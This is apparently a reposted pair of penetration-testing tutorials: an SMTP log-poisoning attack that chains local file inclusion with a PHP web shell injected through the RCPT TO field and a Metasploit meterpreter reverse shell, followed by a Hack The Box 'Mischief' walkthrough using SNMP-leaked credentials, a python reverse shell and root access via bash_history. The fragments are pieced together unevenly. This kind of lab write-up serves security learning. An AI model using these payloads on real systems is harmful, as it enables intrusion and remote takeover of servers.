When we provide the password to the root.exe we get our final flag.
![[Image: 33.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-nfc61exURLU/XDRpgov8VuI/AAAAAAAAb-0/VLXTrqNEzmAWYzhZKo0U4BjTFkETt3VBgCLcBGAs/s1600/33.png?w=687&ssl=1)
In this Post, we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “
[To see content please register here]
” and “Beginner Guide to File Inclusion Attack (LFI/RFI)”. Today you will see how we can exploit a web server by abusing SMTP services if the web server is vulnerable to local file Inclusion.Let’s Start!!
With the help of Nmap, we scan for port 25 and as result, it shows port 25 is open for SMTP service.
nmap -p25 192.168.1.107
1
nmap -p25 192.168.1.107
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-7hOHNfsZhLI/XDIkX_ZyIaI/AAAAAAAAb8U/HUJ0LDA6l00xhv_9M-BFgdU1UKyC2UTCwCEwYBhgL/s1600/1.png?w=687&ssl=1)
This attack is truly based on Local file Inclusion attack; therefore I took help of our previous
[To see content please register here]
where I Created a PHP file which will allow the user to include a file through file parameter.As a result, you can observe that we are able to access /etc/passwd file of the victim machine.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-mZXcez7fPso/XDIkYPkojaI/AAAAAAAAb8Y/IYanVFP2Wg0EVxqOXhSIkNmN2KFdG5HCACEwYBhgL/s1600/2.png?w=687&ssl=1)
Now if you are able to access the mail.log file due to LFI, it means the mail.log has read and write permission and hence we can infect the log file by injecting malicious code.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-PixryJxxZeE/XDIkYjq29qI/AAAAAAAAb8c/OHwX4qA6E1MyYGRkOtqmSb3BEVZzp_vSgCEwYBhgL/s1600/4.png?w=687&ssl=1)
Now let’s try to enumerate further and connect to the SMTP (25) port
telnet 192.168.1.107 25
1
telnet 192.168.1.107 25
As we can see, we got connected to the victim machine successfully. Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via the “RCPT TO” option. Since the mail.log file generates a log for every mail when we try to connect with the web server. Taking advantage of this feature now I will send malicious PHP code as the fake user and it will get added automatically in the mail.log file as a new log.
MAIL FROM:<[email protected]>
RCPT TO:<?php system($_GET['c']); ?>
1
2
MAIL FROM:<[email protected]>
RCPT TO:<?php system($_GET['c']); ?>
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-sEa7XI2bRK8/XDIkY6xtxYI/AAAAAAAAb8g/g6PtBX5TEe8AVOktauZgP4P3xYjpGLcowCEwYBhgL/s1600/5.png?w=687&ssl=1)
Note: We can ignore the 501 5.1.3 Bad recipient address syntax server response as seen in the above screenshot because ideally the internal email program of the server (victim machine), is expecting us to input an email ID and not the OS commands.
As our goal is to inject PHP code into the logs and this stage is called logfile poisoning and we can clearly see that details of mail.log, as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.
192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&c=ifconfig
1
192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&c=ifconfig
You can observe its output in its source code as shown in the below image:
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-vb1aGqQ9Grs/XDIkZYk0OpI/AAAAAAAAb8k/H9nGzdwHy7wfGspMsxbB0Ue4rOCofPdyACEwYBhgL/s1600/6.png?w=687&ssl=1)
This technique is known as SMTP log poisoning and through such type of vulnerability, we can easily take the reverse shell of the victim’s machine.
Execute following command inside Metasploit:
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set lport 8888
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set lport 8888
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-5CuiRVNce7Q/XDIkZt-73AI/AAAAAAAAb8o/Nn4LcNDNwVQ8194neNPZiwXno3BwT0AHQCEwYBhgL/s1600/7.png?w=687&ssl=1)
Paste the above copied malicious code inside URL as shown in the given image and execute it as cmd comment.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-itzkcck-F7Q/XDIkZ9rLChI/AAAAAAAAb8s/D3NvuLtnJrAegS_mo3pSjc-q1lzwQk4nQCEwYBhgL/s1600/8.png?w=687&ssl=1)
When the above code gets executed you will get meterpreter session 1 of the targeted web server.
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
1
2
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-vaDqFvMs364/XDIkaGSOidI/AAAAAAAAb8w/StmbOIpOWTs0bPrs_T3eWS14EwxBRxJEgCEwYBhgL/s1600/9.png?w=687&ssl=1)
Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Penetration Methodologies
Scanning Network
- TCP and UDP ports scanning (Nmap)
- SNMP Service Enumeration (Nmap Script)
- Obtain credential for port 3366 login
- Identify IPv6 address (ENYX)
- Scanning Ipv6 (Nmap)
- Abusing web server through the Command Execution Panel
- Obtain reverse Shell via ncat
- Get user.txt flag
- Obtain root password from bash_history
- Find root.txt flag
Note: Since these labs are online available therefore they have a static IP. The IP of this lab is 10.10.10.92
Let’s start off with our nmap Aggressive scan to find out the open ports and services.
nmap -A 10.10.10.92
1
nmap -A 10.10.10.92
![[Image: 1.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-UlTNM7OWbp4/XDIQDt_2ezI/AAAAAAAAb7I/fMUQ-mVPtSQb_nSPmdjtINJjznjiJoYRwCLcBGAs/s1600/1.png?w=687)
But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.
nmap -sU 10.10.10.92
1
nmap -sU 10.10.10.92
Enumeration
Because we were knowing SNMP service is enable in the network, therefore I run nmap script command for SNMP enumeration.
nmap -p161 –sC –sV –sU 10.10.10.92
1
nmap -p161 –sC –sV –sU 10.10.10.92
![[Image: 3.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-YEW9teGlKDk/XDIQGK5Q3SI/AAAAAAAAb7c/l51C-EPVezMxBXfEwuq0UHJ7g9Y73A1TwCLcBGAs/s1600/3.png?w=687)
Hmmm!! So here I found something very interesting and it looks like the login credential to be used as authentication to connect port 3366.
![[Image: 4.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-vO9vAEfaHjo/XDIQGIJBpII/AAAAAAAAb7g/umiV4Q7AiLkFJJ5kbvPNkuikQ2jbF_NqACLcBGAs/s1600/4.png?w=687)
Let’s navigate to port 3366 in the web browser and enter the following credential.
Username: loki
Password: godofmischiefisloki
1
2
Username: loki
Password: godofmischiefisloki
![[Image: 5.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-kKg5CWc6fZs/XDIQGeglY6I/AAAAAAAAb7k/RP4efPmcOBs6cQ2QFavFYZ8V6Sv_08s3QCLcBGAs/s1600/5.png?w=687)
Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.
![[Image: 6.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-XZgiNPvGE4o/XDIQIp867qI/AAAAAAAAb7s/OKj3WelZHPgSH_T0thFVWHGX4yw99m3HACLcBGAs/s1600/6.png?w=687)
We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this
[To see content please register here]
.git clone //github.com/trickster0/Enyx.git
python enyx.py 2c public 10.10.10.92
1
2
git clone //github.com/trickster0/Enyx.git
python enyx.py 2c public 10.10.10.92
So as you can observe that we have enumerated IPv6 address of victim’s machine and further scan it using nmap command given below:
nmap -6 <target IPV6>
1
nmap -6 <target IPV6>
Hmmm!! So along with Port 22, this time it has also shown port 80 for HTTP services.
![[Image: 7.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-xIi-yTUzB8Q/XDIQIch6BDI/AAAAAAAAb7o/pP3bDCQVgvMcGqmZrQ-IFI9MuH6wIkZTACLcBGAs/s1600/7.png?w=687)
So we navigate to the web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.
![[Image: 8.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-nWjkwktwn1g/XDIQIqIJufI/AAAAAAAAb7w/nJQ4TE-P9n4tA93Dop0znA29556W0llxACLcBGAs/s1600/8.png?w=687)
Access Victim’s Shell
Further, I try brute force for username and successfully get login with the following combination:
Username: administrator
Password: trickeryanddeceit
1
2
Username: administrator
Password: trickeryanddeceit
Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploited and we can own reverse shell of the target machine.
![[Image: 9.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-M_616FNYz2o/XDIQJQtjf5I/AAAAAAAAb70/2VlYCjw-7asM5KX0Zywfc3zThhifGuYlgCLcBGAs/s1600/9.png?w=687)
But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.
![[Image: 10.1.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-UJgW05SVqZ4/XDIQDvSXu7I/AAAAAAAAb7E/lYEcreWdpNQIjQjWhtgoTdTNdgZa6sKkQCLcBGAs/s1600/10.1.png?w=687)
For the reverse shell, I use python reverse shellcode from pentestmonkey, and modify lhost IP from our IPv6 address. Since both nodes belong to IPv6, therefore we need a listener which can establish a reverse connection such as ncat, therefore we started ncat as the listener on port 1234.
ncat -6- -lvp 1234
1
ncat -6- -lvp 1234
![[Image: 10.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-88YxdRkjUmk/XDIQDWFuAtI/AAAAAAAAb7A/3eqxaCmBaHkx1bGp15ec6Q455vzp0ma3wCLcBGAs/s1600/10.png?w=687)
As soon we will execute the malicious python code, we will get a reverse connection via ncat.
Great!! You can observe that we have access to remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.
![[Image: 11.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-JQEixRiOueQ/XDIQEe9YF_I/AAAAAAAAb7M/Ee_4SmO-sG0cwK3ldGr5Sb-w78-IQyXNQCLcBGAs/s1600/11.png?w=687)
As port 22 was running, therefore we connect to the remote machine through ssh using the following credential.
Username: loki
Password: lokiisthebestnorsegod
ssh [email protected]
1
2
3
Username: loki
Password: lokiisthebestnorsegod
ssh [email protected]
And successfully found user.txt file this time as shown below.
![[Image: 13.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-UrqdPd2Eem0/XDIQEzHVBjI/AAAAAAAAb7Q/_MkmX6VuO-8zu5vAbPcRdnQXOEarsXYhgCLcBGAs/s1600/13.png?w=687)
Privilege Escalation
While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.
![[Image: 14.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-pLmy2PuukHI/XDIQE-89SVI/AAAAAAAAb7U/yRsqR3p6szE-vzAmA4JAf9RarnZohmG-QCLcBGAs/s1600/14.png?w=687)
Therefore, we move back to www-data user shell to run switch user command and enter the above-found password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command, we try to enumerate the path of root.txt.
find / -name root.txt
1
find / -name root.txt
Booom!! We got the path of the root.txt file and as you can observe that we have successfully captured the last flag and finished this challenge.
![[Image: 15.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-0YF7PkuOjRE/XDIQFTmsedI/AAAAAAAAb7Y/0PNEjDlql5ciT79gl7RRS1WquSziHVqWwCLcBGAs/s1600/15.png?w=687)
